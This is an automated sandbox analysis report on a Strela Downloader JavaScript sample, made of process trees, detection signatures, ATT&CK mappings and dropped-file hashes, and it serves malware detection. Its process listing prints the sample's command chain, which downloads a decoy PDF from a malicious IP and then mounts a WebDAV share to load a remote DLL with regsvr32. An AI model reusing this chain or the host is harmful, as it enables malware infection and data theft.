Windows
Analysis Report
158324772041924674.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 6524 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\15832 4772041924 674.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 1408 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user~1 \AppData\L ocal\Temp\ invoice.pd f http://1 93.143.1.2 05/invoice .php"&&sta rt C:\User s\user~1\A ppData\Loc al\Temp\in voice.pdf& &cmd /c ne t use \\19 3.143.1.20 5@8888\dav wwwroot\&& cmd /c reg svr32 /s \ \193.143.1 .205@8888\ davwwwroot \278411975 132181.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5108 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6696 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user~1\Ap pData\Loca l\Temp\inv oice.pdf h ttp://193. 143.1.205/ invoice.ph p" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 7552 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user ~1\AppData \Local\Tem p\invoice. pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 7808 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7996 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 44 --field -trial-han dle=1764,i ,160627047 5773455562 ,171388689 6576117463 8,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 7876 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: frack113, Nasreddine Bencherchali: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | Virustotal | Browse | ||
8% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588791 |
Start date and time: | 2025-01-11 05:33:08 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 52s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 26 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 158324772041924674.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/63@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 172.64.41.3, 162.159.61.3, 23.209.209.135, 2.23.242.162, 199.232.214.172, 2.16.168.105, 2.16.168.107, 23.200.0.33, 23.200.0.21, 192.168.2.7, 13.107.246.45, 54.224.241.105, 20.109.210.53, 23.56.162.204
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, time.windows.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
23:34:04 | API Interceptor | |
23:34:08 | API Interceptor | |
23:34:08 | API Interceptor | |
23:34:16 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.706709063299764 |
Encrypted: | false |
SSDEEP: | 1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqR:2JIB/wUKUKQncEmYRTwh0t |
MD5: | F21A4C4647A9D51226EA2A948D1F40C2 |
SHA1: | 2661C7C71EA5BC3FF82D1332A5A0D2BB3C0D9103 |
SHA-256: | EDBC93393F1AEC0DD81EE10F6EBD27FF61EFB94EBC36B2857E5A2085CD19A467 |
SHA-512: | D3C951F0E4563332AA55A786ABD9477A89FA06723D34A99CE836890ACEBD72FB99983F7C38F9BCA56613D6EDE37C825A3EBD1FEF3CB4CF6989021FCEB2BC30C3 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7900045826406578 |
Encrypted: | false |
SSDEEP: | 1536:OfqSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+D:OfqazaPvgurTd42UgSii |
MD5: | B02F872E3E9F2E9A2AD5D4489B167673 |
SHA1: | 7287D6C16AFD201D6B19BF8EC1D9DA9CCA83DA34 |
SHA-256: | F484A2F0886344620DDF0EA33231EDC51E0606C733BBC13F53A51309A8B216B5 |
SHA-512: | 66D32C79ACA27EBE02E40DAEB9EC6133E6B1C5A43D57905BBC79234461F27EFAD509DD0D92C3123370492157FC7218C00DD45620A6AE93ADECE3FE01D5B4CDD4 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08228481545910313 |
Encrypted: | false |
